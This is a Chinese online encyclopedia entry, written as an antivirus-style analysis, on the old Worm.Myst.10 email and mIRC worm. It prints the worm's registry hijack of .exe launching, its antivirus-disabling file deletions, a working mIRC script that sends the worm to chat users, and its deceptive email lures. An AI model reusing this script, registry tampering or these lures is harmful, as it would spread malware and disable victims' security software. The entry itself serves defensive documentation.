请输入您要查询的百科知识:

 

词条 Worm.Myst.10
释义

Worm.Myst.10

病毒别名:Email-Worm.Win32.generic[AVP],I-Worm/Myst.10[KV],Worm.Myst[RS]

处理时间:

威胁级别:★★

中文名称:我的最爱

病毒类型:蠕虫

影响系统:Win9x / WinNT

病毒行为:

这是一个用VB编写的蠕虫病毒,该病毒通过电子邮件和mIRC聊天系统进行传播。该病毒会修改.exe的文件关联到病毒,使得每次运行exe文件的时候该病毒都会被执行;该病毒会删除三款杀毒软件的某些数据使得这些杀毒软件无法正常运行。该病毒除了通过在Outlook地址薄里面收集邮件地址,将病毒做为附件发送出去之外,它还会通过向mIRC的脚本配置文件中写入一些脚本,使得该病毒能够通过mIRC聊天系统传播。

1)病毒将自己拷贝到:

C:\\windows\\system\\systray_.exe

C:\\windows\\system\\runtray_.dll

2)释放临时文件C:\\ModReg.reg,并通过regedit /s C:\\ModReg.reg命令写入注册表

修改exe的文件关联到病毒,使得每次运行exe文件的时候该病毒都会被执行

HKEY_CLASSES_ROOT\\exefile\\shell\\open\\command

(Default)=""C:\\windows\\system\\systray_.exe" %1 %*"

HKEY_LOCAL_MACHINE\\Software\\McAfee\\Scan95

"SerialNum"="MYST v1.0 by MYSTiQUE"

"CurrentVersionNumber"="666"

"DAT"="NONE"

"DATFile"="-2000"

"VirusInfoURL"="http://ma***.sexchat.***"

"bVShieldEnabled"=0x0

为病毒添加启动项:

HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run

"SystemTray"="C:\\Windows\\system\\systray_.exe"

3)向mIRC的脚本配置文件C:\\mirc\\script.ini中写入以下内容,使得该病毒能够通过mIRC聊天系统传播

[script]

n0= on 1:TEXT:*sex*:#:{

n1= .msg $nick Hello, sorry to disturb you, but I just got a very kinky adult slideshow and was wondering if you would like a copy.So I'm going to send you one.

n2= .copy C:\\windows\\system\\runtray_.dll C:\\windows\\system\\install_show.exe

n3= .dcc send $nick C:\\windows\\system\\install_show.exe

n4= }

4)删除三款杀毒软件的以下文件:

C:\\Program Files\orton AntiVirus\\*.dat

C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus Personal Pro\\*.*

C:\\Program Files\\Common Files\\KAV Shared Files\\*.*

5)在Outlook里面收集邮件地址,并将病毒做为附件发送给这些邮件接收者

取下面的某一行做为邮件主题:

Here is the e-mail attachment I told you about earlier, It's an installation program for an adult screensaver slideshow program

Here is the e-mail attachment I told you about earlier, It's an installation program for an Outlook Service Release upgrade

Here is the e-mail attachment I told you about earlier, It's an installation program for a Microsoft Explorer Patch

Here is the e-mail attachment I told you about earlier, It's an installation program for a Desktop Game I got off the internet

Here is the e-mail attachment I told you about earlier, It's an installation program for a brand-new MP3 player and plug-ins

Here is the e-mail attachment I told you about earlier, It's an installation program for an Microsoft Internet Explorer Service Pack (Q401243)

Here is the e-mail attachment I told you about earlier, It's an installation program for an Kaspersky Anti-Virus 4.0 bugfix

邮件正文:

Hey, sorry I haven't written to you in a while. Well you could call it a while. I'm writing this E-mail to let you know of an attachment im sending with the next mail.

Here it is

邮件附件:C:\\windows\\install_.exe

随便看

 

百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。

 

Copyright © 2004-2023 Cnenc.net All Rights Reserved
更新时间:2024/12/24 7:15:16